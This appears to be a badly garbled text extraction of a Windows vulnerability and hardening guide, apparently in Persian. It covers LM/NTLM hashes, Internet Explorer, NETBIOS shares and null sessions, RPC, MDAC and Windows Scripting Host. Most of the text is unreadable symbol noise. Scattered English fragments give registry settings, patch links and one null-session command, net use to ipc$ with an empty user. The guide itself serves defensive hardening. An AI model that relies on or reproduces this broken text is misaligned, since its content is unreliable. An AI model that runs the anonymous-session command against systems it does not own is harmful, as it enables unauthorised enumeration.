account _T 9 # $l 'A) 0 < 5 )6& *] - j 5 .Y Service accounts Y &5 - <\ X 6 ^P A) 2 Stand alone ?), " U 4 0 < - Y cracking • F " GX) 2 0 P ! C, E 5 $? " ) l '7 B 5! crack ? @ $ ?@ P! ) -, $ 6& 0 ? @ \8 9 H?@ 3 I N ? " (, ! 0, < / G ;3 A $? b 6& 3 ?# -, < - 3•?@ SB g 0 <- v 4 6%5G1 ) C 3 0 <I $? DY/ : ? @ DY/ (,! 7 ? K6% ' I ' DY/ ) ,< A" @ ? 3 = GX $ K6( 4 2 ` < $ ) [ >/ ?@ " , < )W 3 ("c ) P ! ) 6& -, < % L , Y 5! ( 5 -, ("c 2 K ("c 6account F $, 5 6A" @ ? <• (E MR/ 2 1E 0 6 N4 0 ^P 5 6 $ 5 - Y 6account &5 ) : , P account ) 0 2 F ? , GA ,account #P< ) 0, < 4 ' 0 K B 5F " $, P !& " %P H)S E $6 ) H 6 F) ? N ,< P !& 3 ("c P !" “and must be changed Your password has expired O* $, < H,, e G A" @ P! & 2 < (,! $ N 6& ,K A 456 • 2A N +A ,P 0 ' ,6 3 B . P ! crack ("c "] $ P P! ?@ ?, 6& & $_ E 6 % < P! I l '7 B 5! $ O * - . 
W L3 6& F ) \ X P !& P! F ( E -,< DY/ 2< ( E -,< DY/ 2 < -,< +H ) F $ 6 0 K6A) " - Y $= GX , 5 ,H ) #. %5G1 6& . 7 $S 0 ? P! craking P !& B 1 I K6 & N : ^P 6account ? )&' I 1 -,< , K ) " - 4 $,< W 3 K62 ) 5 ?@" - Y 0 ?@ ? (N " K6account MR/ ) ) X 3 "% , ?@ , P4 ' account MR/ I %L 0 S , N) )% ! b - Y & $ F P 4 -,< K -, < K 3 - Y $, - 5 V I : G 2N P 7 # " - Y 2 P$ % / ? 59 62 ) " ? " # 54 :&N 0 1 6 „ 1 # 2 3@ 56 1 P! 0 )? 3 - + $S&• -)8! ? $ P! & 6 & " $ #P < 6U ) P !& , N $S 2, 0 0 lan &N F 6, & 2 LM A9(? 2A& * B • G ;NA 8 _Version2] Ntlmv2 NT LAN Manager A) " - Y Manager 0 $, K I ,6 3 6(& # P ) I #. N& " - Y E , B $ " T),F a,6 ? $, 5 T - 5 M 9 $NTMV2 v 4 |j1 LM pqqq ) NT "), ) 6=G l ' BH Rgistry key Hive: HKEY_LOCAL_MACHINE Key: System\CurrentControl Set\Control\LSA Value: LMCompatibilityLevel ValidRange: 0-5 Default :0 f4 Y 2 , , )d* , K A) ) \ $l ' Q 4 • a,< 7 # " & 6$NTLM ) LM A) h v 4T 0 < 5 - Y NTMv2 NTLMV2 7 # " - Y NTLM , K A) h T …p NTMV2 , K A) h T …s LM , K ;! DC …x ) -,< NTLM ) LM , K ;! DC …r 0 ' R4 NTLMv2 , K C ' …w 0 - Y ? 0 5 lan Manager , K i: 6 pqqq "), ) LAN ^P 0, #4 75 I , #4 ("c : $ Manager authentication level security: Network I ) SP4NT "), ) $ 6 -, < S L ?@ " , G ) ? , U) LM hashes T " 5 ("c 2 5 ,H ? , U) NT Lan ? E 4 , 2 6& " - Y 7 ? I K6 $ NTLMv2 , 5 # ‡ NTLM " - Y : # $, < f4 , Controllers Domain I $l 'U ) 0_ #P < ) (&B P LM I BH " - Y ) Y _ {† "), ) hashing 0 5 T5! Domain Controller 0 ' 6 SL " U4 0 0, < $ 5 NTLMv2 " - Y u? ) 6 , 5 - Y Network Client Microsoft - 56 $, 5 ? O* S l ' N 4] ' LMCompatibility ( , ) Directory Services Client ?@ ) (5 NTMv2 " {† ) {r "), ) e 'j 4 7 I 2 ) $ Manager authentication Level LAN 0, ) ( ,H ? @ " Security Options ) Policies Local O* S pqqs ) XP "), ) ) , I ) T G'Policy Local Security & • # & XP ) pqqs $pqqq "), ) -,< K SL , , ) {r "), )] : I Manager,version LMCompatibility Level authentication level Manager ("c 0 ' U) Send NTLMv2 Respone only\Refuse LM I ) ), . T 5! $ : MR / ^ P B %K & 2 ? 
@ " - LM hashes E ? 5 TG' g 1 )- -, < SL ? @ ) (E 2 l '7 B 5! T $ " ) ,< ,6 * Value on next 0 ? , *& • LM hashes & # ') # C ' F) ?@ " - Y XP ) pqqs $ _ -, < E l ', B Windows 2000 Domain Controller ) 5 - 3•& LAN - < # 2 6 E , B0 I 3•$ #P< I ) SP2] 2000 "), ) ,G 25 # GLmhash + A 1 A7T " ) SAM 0 ?# Local Security Poclicy , # 0,6 $Lanman hashes $,< E $Xp ) pqqs "), ) & ? 5 T G' ? 0 password change Lan manager hash network security: Do not store ("c : 2 ) Local Policies 6 $l '7 - < hash LM " 0 ' # 2 # " I M ,6 ) T G'Policy Local Security & u T5! " U4 0, O* S Security Options ("c 0, < +H ) [ $-, < E 7 u -,< " , - , ,F hashes LM E W L3 P !& - 3• : ) ("c Y7 N 4C ' $-,< K 6A) F LM hashes ) 0,< , 6 3 MR/ $,6 Rgistry key Hive: Hkey_local_Machine Key: System\Current ControlSet\Control\LSA\NolMHash (E u 3 6 & GSAM :(A AVL + A A ,WA A & 6A) " hashes " P ! A A *& • Hash A AU;( + SA A 0 6& ? )@ , $ P ! & cracking I a, 5 4 " I 2 , a #P< " P ! - Y 6& = a 2 ] #P< F M, 6 - Y ethereal 0_ 0-,< ˆK 6 #P< " - Y #P < 67 MR/ ) d * I , 1' pqqq ) NT4 "), ) b < ,6 3 % '" - Y _ C:\Winnt\System32\ Config F) ?@ Q# ?# "C ' SAM % '0,< -,< " , - ? 0 )@ - 56) ), . Controllers Domain C L3 @ 78# 3 I & Repair F ) Lock "), ) N % ! , & 9 i: j &') SAM % ' Q # " ("c : l '% '0SAM % ' Q # $l '% '0,< 2< 6& " ? 5!] SystemRoot%\System32\Config C % ! 3 N 4 6 Backup I # &' ) -,< ' Backup 7 !89 " 0 a 5 - Y " 7c " ? B5# 7 !89 R3 - How to Disable LM Authentication on Windows NT - How to Enable NTLMv2 Authentication for Windows 95/98/2000/NT - New Registry Key to Remove LM Hashes from Active Directory and Security Account Manager E ! " % &# $X Internet Explorer (IE) 0 ' ) # ?@ "), ) ( '784 N ( N ) Patch 5 $, R4S @^ h IE ? 6T R4 S @ ^ 0 T#< ") 85/ , 6 ) B . % $ 6 K6 * ,6 3 " 5 IE ) ,G F) "), ) ) K6 6 ) SB g " - Y 7 ) X, < 0 ) SL & + 2 , ,F ) 2 3@ " 6) 0 < ,6 3 -,6 ) IE W F) IE < L3 ("c Windows U ) 5 6 $, < -, 4 R4 S @ ^ - Y "), ) ') # 6 &'( / $IE ) , F) ?, 0 < ?@ ! ". 
/0(123& ) # 6Patch SL # http://windowsupdate.microsoft.com/ ? 0 ( E " ) HFNetChk " ? , F) ' Update Windows U ) ) # Analyzer Microsoft F Online ) HS @), , e G , < T G' 0 5 F) $, 5 C 5! ) SL ,6U ) $U# +, -, < - < 0 < ,6 3 ) # ) - *1 6, ) 6) Z '?@ , $() * 7) Y ) )Y ?5F T @^ 6 Y $T G' 6 6% ' R4 S @ IE $O) 7 Y. a I . # R4S b l ' R4 S @ ^ Z F $0 6* , 63 -, < ( E ? 5F ) MIME \ ) ,6(E 0 $IE ) IE -, < SL , G 78 5/ ? $"), ) U ' ' & $ B . -,< SL e 'j 4 O) ) -, < S L " ? 2 $, < -, 6Patch TG'update 0 5 - Y Baseline Security Check Qualys Browser a I _O) 0 5 - Y $IE GX) P ) F &1 @ ,< 6 &] B : )c ! " %& IE ) Y - Y ) 2 -,< - < R 4 S @ & IE 1 ) )- 5 I # B ! 0, Z 0, < 0 0, K5 ( N ) Z - Y % H) W L* S @^ ‰8 ;! ("c 6patch ?@ $ 6Service Pack + F Patch 2 3@ 0 5 SL ) ("c : & N 'X IE + i. %/ , ? #4) I $l ' 3 7 # " % 0, * P R4 # IE ! 5E IE GX) ? ?@ a 5 TP Inetnet 6% bP & O* • Custom Level ? 5 T G') Security Tab & O* • 4" - Y Z T G'$ " n 9 " Options Tools ("c 2 0, a <( E %1 , $IE " F) (,! $ $-,< K Service Pack 2 3@ _†pp{pr] 6Patch ("c 0 5 - Y Explore 6 SP1 Internet a h @ " ? 2 F j< * - Y 5/5IE * 4$ 0 6Patch ("c F SB g W L3 2 $j< l ' * - Y IE6.0 * " # ' 5 456 123& R4 S @ ^ 6* K P 785/ Q Zone. R4 S @ ^ n. $ActiveX Controls ) Scripting Active 6@)7 I l ' 6% 4" - ) ?,< Prompt for Allow paste operations via & $Scripting j * • Clipboard n 9 " ("c script TG' g I . W L3 5 Active Scripting 0_, 5 - Y $l ' % N4 - < # 2 4" 6 Download signed Active X Controls O) " Prompt O* ("c] 0 < ( E " ,G & O* $ • Download unsigned Active X Controls Initialize and script ActiveX Controls not Disable & O* • Disable & O* • marked as safe & $Microsoft j* • & $Microsoft VM j* • High safety for Java permissions High safety for Java permissions N 4) )F 6 B 4 i. F I ("c 0 across domains Access to data 0 TG' g Cross-site scripting 6" E O* $ & $ Miscellaneous j * P 785/ " G5 ^P • I 5 $sources ! " % &# R Windows Remote Access Servies #P< ^ P )Y -, < K „ 1# 6% ^ 6 „ 1 # ) 7 # $"), ) 7) Y 4)7 # " -,< K 3 6 K ) : 2 0, 5 , 6V < ? 
`56 $_PRC] 62 ) E 3 ') #P < 6 BH ) 7 # 0 3 " ) 6 '2 < + 2 F + GX) , 5 ,H ) F ? & & 3)- 3 , " ) " g@ (, ! ) l '=GX ^ $? & 6 '? & # l '% < TP, " 7, F - ) 3" + V <S , 7 L ?5F b ?@ " ?# K % b <R V < ) CIFS File ) - " 4_ (E , b ?& ) K6 * _ - < ) F "), ) ) ,5 I ] 6h) ) ) 6 / 6 ! DY/ - Y " W L3 ) P Q M ,6 l '? 6% ' T $ #P< V < S ? , _ ) #P < , # 4 (, ! % 1 , B . # 4 (,! % 1 , 1 )- 3 7 / pqqw T " 2, ? & " - Y $ #P< V < i. 0, < S 7 B 5! ( E ?# $l ' 6%# ) 4 0,< CH ] 0, 5 F 7 # " % '" - Y Z - $, l '+ System Common Internet ) " 456 Q -NETBIOS H #P< #P< ? & 7 B 5! " - 5 6 '$?@ P l '(& # (SMB Block Message Server)] %# ) 4 ( ,G 7 5F 0 ! " - Y ) 6 '& ^P K6 , 1' ) % 'V < ?# $"), ) % ! -, < <R V < 0 Logon NULL 6i :< 8 Y ^P 6 ) - ) "), ) 4 6 3 $l ' 5/ ) K #P< 6%# ) 4 Q Anonymous $7 B F $NETBIOS #P< ) - " 6* 0, 5 0, 5 ("c % 4 $ #P < E 6@ ) 6 , 1' 3 ) 6 I] 6 ' #P< ? ) F + 2 < ) ?, 3 ?# $ < ( E #P< -, < <R V < + 0 ' ,6 3 j6 . " : 7, , " " 3 $ 3 ? #56 <R V < P , )- Y Z _ 6% ' #4 # 0 :3 ) Logon Anonymouse Null Session 85! $Session C P !& )( ] l89 $_ 13Null Session " 0 6U ) 0 - Y 6 ) "), )NT ? G $Local System account E n 9 " #P< ? G $bP 7 L 6 A R4 3 : l' 0, 5 Null Session H$ $ P H ^P Local ,K 1/ 6* I5 Z F 0 * ?# $ " %1 , 1 ), 5 5 6 ' u ? # $pqqq "), ) " % P H 6* KN* 4 Session Null pqqq "), ) 2 ) 6' , _ & + R 1 : ${†"), )CE $NT $pqqq $ME ) XP B B & ) 6N , , # 4 $ &'( - P< 7 5 I H 0 ) - Y $? , 6 native A R 4Null Session ) 6 $? )Z F B . 0, 5 %# $ 6-) Z F computer account Local U ) H ) 6 'pqqq "), ) " % P H ] <+ I5 ) pqqqLocal System account ) # 3 7 !89 j 5 null Session "), ) 0, 5 6U ) 6U ) Computer " $, bP P! ?), -,< E 1 6, F) I5 ) ? @ ) 6 '? 5F ,6 3O * Z , < -, 6" E 0, 5 b E !89 E - Y " $ P 75 I ) - " 23 , - 9*5 ) l ' GX) " - Y Z :&27 RPC Remote Procedure Calls:[ " ] "), ) 6* " , GNT $pqqq $XP (& # " 9P I nter process Z F T/ ) - " ) N ?& 0 ' 7 F , 3 ' ) 3 - *1 , 0_ B . F \ " 785/ ( E 3 H F - Y ) ,G 785/ ? 0,< H F 2 Blaster/Msblast/Lovsan ) 6" E - 5 ] 0 Nachi/ Welchia " - Y 0, 5 H $? 
& $l ' R 4 S @ : " - Y ) - " ?& 6( 2 " _pqqs $ 0, - - Y l ' R4 S @ : " Dos R4 S @ ^ ! ^P $ RPC0 ! ") * 0, +, H,, 2 e G + %K bP : R4 S @ d * 7c #< d * I5 % 'V < U ) ?# F ? $l ' 5 & - .NETBIOS T L. &'Afentis security 0,< A8 " %P H 7 !89 #B 5! - . " )@ +5F I 5 6@ 2 a 0, 5 $ -,< h PH NAT ("c NETBIOS $, L W L3 : ,G " ? NETBIOS - Y " Netbios Auditing Tool ( -,< K ) W L* ^ 6* ! ". /0(123& 0 5 NAT 7 5B " b "), ) 6 B / $ ) #) " ) (E - Y $% ' h @ " http:// www. Afentis. Com/resources/win32/nat - Y 0 5 " , v2.11 Legion N ${† ) {Š "), ) ? % 'V <Legion b " , -,< K Rhino9 #P< V < $pqqq "), )? Checker)Security Fridays Share ? , ) {† ${Š 6* ] "), )CE S @ d * 0, U) 4 * GX) 5 - Y I5 _ SPC)Password % 'V < ? # $l ' 2 3@ ] I5 0, 5 - Y _ R4Level password share "), ) ? ^P NT ? @ ) ] sp4 $pqqq $_,< -,< SL XP Baseline Security Advisor S @ ? & W L3 : R4SMB 0, 5 l '%# ) 0, 5 B . ? & "), ) ? ) ? 5 M 9 ? $pqqs ) ("c A & R3 )- Y ( ,H $ R4 S @ " - Y Share net , 5 -,6 €" ? " , 6 ) ( E ) - " ? & NT $pqqq $XP 0 $l ' <+ ^P 6' B5# 7 !89 " , pqqs ) 1$ b3 n 9 " ) 6@ ]Net Share/ $ 0_ 5 - Y 0 -, < K ' j $ <+ <+ T 5! ) ^P 6( E ],< 7 !89 S a ‰8 - Y " 7c ) 7 < "), ) <+ W 3 <+ … )% ' ^ P $ : u !89 1 2 6( E " %P H$ F) 1 ) I 5 0_ < ( E " ? u 1/ + 6@C 8 <+ 7 ?, ("c 2 W L3 L 7 u u $-,6 $ I - .… : " ) - 3•… 3 6" E MR / P !& DY/ ) -,< - ) 6 ,1'XP "), ) < ,1' V < ? 5 TG' g - .… "), )XP V < "), ) a 6" E 6* , N ) 6% ' " 6 - .…NTFS <+ ^P e 'j 4 6" E "), )…NT "), ) ) pqqq "), ) $XP S L " % P H ] SP1 " E $_ "7 L Everyone 7 L ) Control Full0, < "), )…XP ? @ ) SP1 " E -, < SL Everyone ) $ 7 L Read0,< "), )…xp ( e 'j 4 7 L Sharedocs < User s/ Documents and settings/All C: /Documents " E ] _ Everyone 7 L ) Full Control0,< d * H + Open Share " GX) I5 + " ? "), ) GX) # 0_, < I5 $ F 5 ?N ) 25 $?N SMB 6* 5 6 <+ ^P R4 S @ ^ - Y % H ?@ : d * 3 ], < File Sharing %K ^ Gibson Research Corporation " ? 
& " 6 N 4 SB g bP 2 I5 ) R4 S @ 0 5 ' j 4 6& a 5 - Y …Nessus0 ) - " - Y I5 - ) -,< ( N $?N j 4 & a …Winfingerprint N 4 aWin32 Host/Network Enumeration A A : + A! A". /A 0(12A 3&Logon Anonymouse 9A I 5 G?" \N( Anonymouse Logon R4 S @ null Session0 K5 TG'$ b3 n 9 " ) " $ " - Y From Command Line Prompt: C:/>net use// ipaddress/ipc$""/user:"" < +P TL ? G ) -,<anonymouse P ! & Null $l ' -, < 'N I System error 5 F " U4 # ' F Ipaddress d * ?@ ( ] user/:” )_ hidden interprocess communications E ] H $l ' R 4 S @ : e G & @ IPC$ E ;! $l ' P 4 $l ' )- F) (, ! -, 6, 2 (E F " U4 # $ 0_ n. I 5 ("c " E 0 < ,6 * =GX 2 % R 4 S @ -, 6, ]% P Hj * -, < 'G Winfingerpirnt d * $+ A R 6 &'( 1 j 5 .Y " 0 ) Nessus ) , 63 & _Null Session0 5 - Y $ I5 ? A $ <- : A A A + A! A ". /A 0(12A 3& NT NTRK)(Resource ( regdump. K F % ' % <$ ' ) # n 9" "), ) ? & NT h @" ? E b3 + & : XP % -)8! 0, 5 http://www. Afentis. Com/top20 0 5 - Y & _ ] F #P< ) 6& K<@ I5 $ 6 ! ". /0(123&RPC ] ' ) # Secutity Analyzer I 5 A) 2 h @ n 9" ? l' 9 Microsoft Baseline $l ' 0 -M2A " - Y 0 - K $ R4 S @ d * http://www. Microsoft. Com/technet/security/tools/Tools/MBSAhom. Asp0 5 ! " ' 456 123& DY/ - .NETBIOSa bP 785/ % - Y ^ - ) pqqq $NT ) $ B 3 Patch-cheking , hotfix ( 2 % H$ 6" E TG' g 7 L I "), ) ? & $l ' & n 9" h 7 , , j6 I5 ,G 6 #6 " ? : 2 a 5 5 ?@ " - Y ) X # sharing ? 5 T G' g 0,< CE ) {† ${Š "), ) ? , * ? G User-Level share access control 7 U) 4 L $, < NT "), ) Dmain " 0, 6% 'V < 0 0 ) FTP n 9 " ? # $sharing " - Y C ' ,6 3 sharing $S ?@ N n 9 " b' -,< <R V < &1 P !& z 0, K5 , 1' 6 , 1'? ? & 7 ) X7 2 , 0, 6 ( E " E ) -,< , K ? 0 #4 sharing ? 5 T G' g ) HTTP R4 7 + $S ? & , $ < +P " - Y I5 Sharing ), . C ' $7 ) X 7 )(E ,1' : 0 <R V < h @ sharing ?# ? ),. 0_,< ("c R 1$ ?@ " $ E < $ DNS F) , -, < K u S X j &' I 5 E u a 5 - Y " : : 2 6 !89 $ 1 2 6T 5! " % PHBackup 7 " ?# $7 ) X Restore " ? ] ,E ?# ] 0 5 ip # -, < ' 0,< < F) ? @ _ !89 + "), ) NT "), ) F ? 5 Restore ) $j F i ) $ Backup - . 4.0 F ? 5 Restore ) j ) $ Backup - . 
F ? 5 Restore ) j ) $ Backup - . pqqq "), ) ) XP "), ) pqqs "), ) "), ) 7 L , " Null sessions " # & K6 2 NT Domain Controllers $, -, < , 0 Windows NT Domain pqqq "), ) " % P H 6* ,63 3" 7 9P #4 I5 pqqs|pqqq "), ) ?# ] -,< Z F P ) 1/ b 2#5 I !89 ?& ? ,< < F) I 2 F Restrict Anonymouse 9 $ pqqq "), ) 6 $ • " - Y $_ , 5 5 1 ) j6 6% 4) 6 # h ), . T 5! a 5 - Y " 7c " 5 $ , I5 0 MR / ,6 3 ) 7 !89 R3 null session " ? : $ ! 5E Anonymouse ? "), ) - Y ?5F T@ -, % / - 0, - Y pqqsRestrict Anonymouse , $ 6 ' 7 !89 K ),. T5! NT Restrict Anonymouse "), ) F , " - Y - . pqqq F a 5 - Y " , Restrict Anonymouse 2 #< ;! F Domain 0 6, B "), ) ? % bP 0, DY/ - . 6" E ) $Service Pack 3 E $l ', , " ()&17 SL " u : E u ] ,E " ?# $7 ) X 7 " ) 7 $ " ? -,<restore : ) E -,<Backup ("c R1$ 0, < < 2 "), ) I5 / )NT 4.0 E 0, < 2t5: $ 6T5! " %PH !89 + 3 u( E " %P H 3 !89 $ 1 2 ?@ " $ a 5 - Y 2#5 Trust pqqq "), ) E K I 5 Restrict Anonymouse 1 " ? , $ K " T#< E i NT 4.0 "), ) E ? 5 Resroe ) $j ) $ Backup - . pqqq "), ) E•? 5 Restore ) j ) $ Backup - . " ' F) ? @ _ ) XP "), ) E ? 5 Restore ) j ) $ Backup - . pqqs "), ) n 9" a K5 E TP ), . T 5! E ,B E I5 I 5 a #P< " %/ ), . $ #P< create the following Registry key HKEY_LOCAL_MACHINE\SYSTEM\Current controlset\control Secure PipeServers\winreg Description:REG_SZ Value:Registry server - " " F) K 6) j 4 7 5 I $"), ) SL ? " 0, 5 $l ', B e 'Access Control List ] , 6) " %/ $ a K5 )? d* 3 $l ', B ,< B E ),. T5! 
E 6" E ) 7 " , Backup Operators ) 6" E ) Regedt32.exe ] I5 , B E E F a, B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control
Edit n 9 " Add Key a "
Enter the following values:
Key Name: SecurePipeServers
Class: REG_SZ
a, B 2 ' F E F - H _ pqqq "), ) TP _ regedit.exe ) & O* z 0,6
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers
Edit n 9 " Add Key & O* a " z
Enter the following values:
Key Name: winreg
Class: REG_SZ
a,B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
Edit n 9 " Add Key & O* a " z
Enter the following values:
Value Name: Description
Data Type: REG_SZ
String: Registry server
a, B 2 ' F E F
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg
0 Permissions " E Z :! ) Security ) B $ winreg O * I5 " E )? 6-) ? 1/ 2 0 5 'X ( E 7 5 I ?, < T G' I 5 ) z 3 Registry Editor 0, K5 ", - E " $-,< F) 0 5 E # 1 u ,LH -,< - < B / 2 3@ ? ^P I "E ? ) i $,< < ), . T 5! a-,< , K ) - " 6U ) : " ("c 6" E " 3 i: ? , B ? @? 5 d* AllowedPaths ^ ] 5 = Machine G 2 $ 0,< E < TP, $ account name U ) 1 Z F T/ winreg T5! (,! ,B ),. T5! P F7 [ , Directory Replicator ) service printer Spooler : ? )&' # ^ I 5 "), ) , # 4 3 6, B )$ ), . ) Users a_
Bypass the access restriction:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg\AllowedPaths
Value: Machine
Value Type: REG_MULTI_SZ - Multi string
Default Data:
System\CurrentControlSet\Control\ProductOptions
System\CurrentControlSet\Control\Print\Printers
System\CurrentControlSet\Services\EventLog
Software\Microsoft\Windows NT\CurrentVersion
System\CurrentControlSet\Services\Replicator
Valid Range: (A valid path to a location in the registry)
Description: Allow machines access to listed locations in the registry provided that no explicit access restrictions exist for that location.
Value: Users
Value Type: REG_MULTI_SZ - Multi string
Default Data: (none)
Valid Range: (A valid path to a location in the registry)
Description: Allow users access to listed locations in the registry provided that no explicit access restrictions exist for that location.
DY/ - .RPC bP %K % SL : 2 A) 2 Windows Update ? 5 TG' g #B 5! ^ P Patch b I ,G ), . T 5! 6MBSA -, < K 6A) : )RPC h @ " - Y http://www.ntbugtrag.com/dcomrpc.asp ("c 0, < , Y , - . : ),. T5! #B 5!RPC 2 U4 ) (E # ?# Patch B 5! $ "), ) U ) g 0 5 T 5! bP ) ? 5 TG' g " 3 I B 67 7 ) 4 ? ' <, 0 F) 2 # 2 " ;! , u, ? @ $ #B 5! . $, < ,< : - < 3 2 F) ) $ 4 " ? 59 " ? 5 RPC ^ ^ Š{s ) ‹‹Š ) ws{ ) wsŠ ‹‹Š ) wsŠ$ws}$ws†UDP0 5 V8 ) "), ) $ R4 S @ : a 5 - Y 67 " : !89 + E 4 ] "), )TCP 67 4) _ ),. T5! - . K<@ I -, < - <Windows Remote Access Services " ? Security Bulletin Service & Hotfix Microsofts editor windows server 2003 Registry) XP "), ) " - Y - . access: Remotely accessible registry paths and subpaths Network Server 2003 Security Guide windows ! " % &# 08 Microsoft Data Access Components (MDAC) MDAC S @^ !89 " - Y R4 MDAC ?5F bP 0 " , -,< ' ) 6, " $l '785/ 0, 5 - Y _O * 7 a 5 - < "2 E B % !) " H # $"), ) : ? ! E % <$ 3 2 6* " ,G ,G 785/ ? ), Z F] 6 # ) " - Y RDS I ] 5 ,H 6 „1# " 3 M ,6 1 ) ,< < F $ R4 S @ ,G % c , -,< K 7c L. , ,F %K F) ) _ overflow buffer - 9 *5 F 5 $ 0 ", RDS 7 5B " MDAC $ " S Remote Data Services 5 , H * H ) - " ? 0, 5 Z F $ , 7" $ =GX ) 6" E - 5 78# ) 6=GX 0_ ?@ B F * ] s) Š MS Access !89 6 GX) 2 3@ 6 T 3" 6 R4 S @ $_ 6 ' ,G 7, , " j ) -,< 3 < % 5 ,H R4 S @ B % c " $ 6 0,< Microsoft jet " ) j &' ] I 5 ("c 7 , )- B . 7 L =GX - 5 l '=GX Microsoft jet Database Database Engine " -, < h PH 6 F) 0 S : $l ' -,< K ) , # 4 (,! )- # (N F ) 6, " 0, -, ! 785/ l '=GX " - Y 3 785/ " # Buffer Overflow ? 
?5F (E %1 , $ : - 5< MDAC0,< P 3]21 MSO3-033 * _ 5 R4 S @ : 2 0 MDAC -, < - < ?@ $pqqs "), ) ' ) # $() * "), ) IIS Q NT 6 ) T)J) $ RDS ) j< l' 6* =GX SQL " MDAC 0, < 6* ] SP2$_ Q$ < l ' R4 S @ : + ‹) q $,< -,< SL w)Š ) pqqq O), ) 0,< XP - 5 ] pqqqU '@? @ ) * SQL Server 7 ? @ ) ?@ ) , 56SPI $_ K6 -, < SL , G ) Server 2000 -,6 N 560, 5 - Y "), ) ! ". /0(123& "), ) ) % ' F) W L3 NT 4.0 - 5 IIS SL # ) * $,< -,< masdcs. Dll” % '] < ( E ("c C 5! l 'files\Common files\System\msadc\msacds.dll c:\program h @ # 0_, < 7) Y ) " , #4 F 2#5 l 'h @ $ patching 2 ( N $,< l '% '% < I % ! 6 ) 5 ,H 7 K &F " 6 @ 6 &'( I5 0 < , 6 3 F) 7 0 H$ : $ (E ? HS @),, e G $-,< - < ("c 3 " ? ( : W (N W L3 MDAC- 5< R4 S @ ^ 2 0 5 - Y L3 ("c ( ,H F b < S )(E R4 S @d * 2< ) 0 -,< i 3 -, < SL 6 &' 456 123& : RDS $Jet " ? ? @ h @http://www.wiretrip.net/rfp/txt/rfp9907.txt & DY/) I5 & " ! " %& 6=GX ' ) # Windows update $l '? # 0 5 - Y $ 0 5 ,6 3 6 &'( MS03-033 21 " ? - .?@ R4 S @ : 2 % _ B ) i.L - . ) ' ) # P 3]2 1 2, 0 5 - Y : 2 http://support .microsoft. come/support/kb/articles/q184/3/72.asp http://www.microsoft.com/technet/security/bulletin/ms99-004.asp http://www.microsoft.com/technet/security/bulletin/ms99-025.asp http://www.microsoft.com/security_bulletins/ms03-033.asp http://www.microsoft.com/technet/treeview/default.asp?url=/technet /security/bulletin/MS03-033.asp http://support.microsoft.com/default,aspx?scid= kb;en-us;82378 ? ver * $l ' 2 3@ 0 =GX 3 $†$p MDAC Z I MDAC * !89 6 F MDAC bP ! ) h @ n 9" ? http://msdn.microsoft.com/library/default.asp?url=download/list/dat aaccess.asp " ? 0 5 : 2 0 5 ' ) -,6 windows update - Y & ! " % &# 5, Scripting Host(WSH Windows) WSH ) 4 # ) #B 5! j &' I 5 6* „ 1 # 0_ - - 5 6, " - Y N 4 -, , 6 # U l ' 6% $"), ) 4] , 5 -,<desktop 0_ 5/ ) K f4 * F $% ' I ], „1# $ K "), ) % !VSH ?# $ ?@ " g@], F -,< K ? G ) K "), ) 7 B 5! ? n 9" C 5 , - 56{† "), ) b "), )VBScript P 21 ) ) ) F " $l ' „ 1 # 0,< ? - 5 IE ') # Z F 4 6' 4 # ) - ? 
5 ,B ) n 9" ) 4 # % ' 0_ # ) #1 ZF -,< < VBScrip 0, b " 3O * M 6 7 % 3 % '\ vbs,. Vbe,js, .jse0) 0wsf 6 '$ B ;! I 5 $, , & WSH O G 0 ) X ! B % !$ ILOVEYOU , ] J)WSH( ) ) - ‰ : " U4 6 K6( F ?# $S T)J) # <R ? 1 _ ) l '( 2 , 0, - 5 - Y ? G $jscript 6" E i: $() * WSH K ) # - 56 ) #B 5! j &' I ) F " $l ' „ 1 # 0, < P IE * „ 1 # 0_ WSH - 4 -, ) Z F U) n 9" -,< K ? ! ?@ " g@ ] , E $% ' b „1# $ 6VBScript 2 1 ) ) "), ) , - 56{† "), ) N I ], 0_ # ) #1 - 56 ') # 5/ ) K f4 * K "), ) % ! $"), ) ) # 6 4 ?# $ - 6, " - Y ZF J)WSh ( ) X ! B % ! $ILOVEYOU ] -,< < , VBScript 7 b M ,6 % I 0, , 3 c ‰ : ?@ " U 4 3 O * WSH % '\ & " wsf.vbs,.vbe,js,jse OG 0 6 '$ ) $() * "), )NT "), ) 2 3@ 6 <R ? 1 K6( F ? # $S ) i: - TJ) ) l '( _ 0, 2 , 0, - 5 - Y # ? ! Jscript 6" E +, WSH n 9 " * B ;! ) 7 $IE ) , $_, G f4 * ] SL {Š ) ME,98,98SE,2000,XP ) WSH,2003 0 ' 0 Windows Scrpt SL e 'j 4 7 h @ " ? Windows Download Script0 5 - Y + ! ". /0(123& -,< SL IE5.5 * - 56 NT ) {Š "), ) ? @ ) K6 • 0 -,< SL pqqs ) XP $ME ${† "), ) ? @ ) 0 WSH # W L3 0 $, <P -, < T ("c ("c : K6 WSH A) " - Y DY/ I : 2 ?@ K6 ' ) SL 0 < ,6 3 )(E #6 • ) HS @e G -,< SL ? @ ) " $,< ,6 3 - < ? @ ,G j* K6 - Y $?@ % ! " %& $ 456 123& , 7 B 5! ) 6 " - Y , " WSH 0,< , 6 3 F T#< 3 $l '% l' 6 ? 2 & * BWSH - < # 2 4 MR/ ) ? 5 TG' g 7 ("c , )- „ 1 # WSH ? 59 T G' g ? ) MR / $ 6 bP %K )- ) " ,G ) 785/ % WSH 5 " ) ?@ "), ) % ! ?@ DY/ #B 5! " I # 3 3 * $ N ?), ) $ ] 40 5 TG' g l '% 4$ 0_,< Noscript.exe b 8 $ WSH 6h8 % '( Wscript.exe ) Cscript.exe 6, BShell\Open2\ Command E 6 6 ^ -,< K $ Sysmantec U ) # 5 SL F W L3 I ("c ) Shell/Open/Command $ N 4 $S 0, < , 6 3 ( E $? @ Noscript.exea K5 TP Y 2 , 0, 5 ) P Q M , 6 " I' " Noscript.exe $ Norton Script Disabler/Enabler ) TG'] WSH GX) 2 3@ Z F " U 4• F #B 5! W 6A" L3 ("c 4Desktop K6% '] # wsf0.vbs,vbe,js,jse, $ OG 6% '] - ?# ? 6 -, < ( E # $-, < < N 4) - j 5 6 '?@ ? 5 TG' g , DY/ $ 5 %K I 6% ' "), ) e 'j 4 , #4)75I j 5 6 2 6% 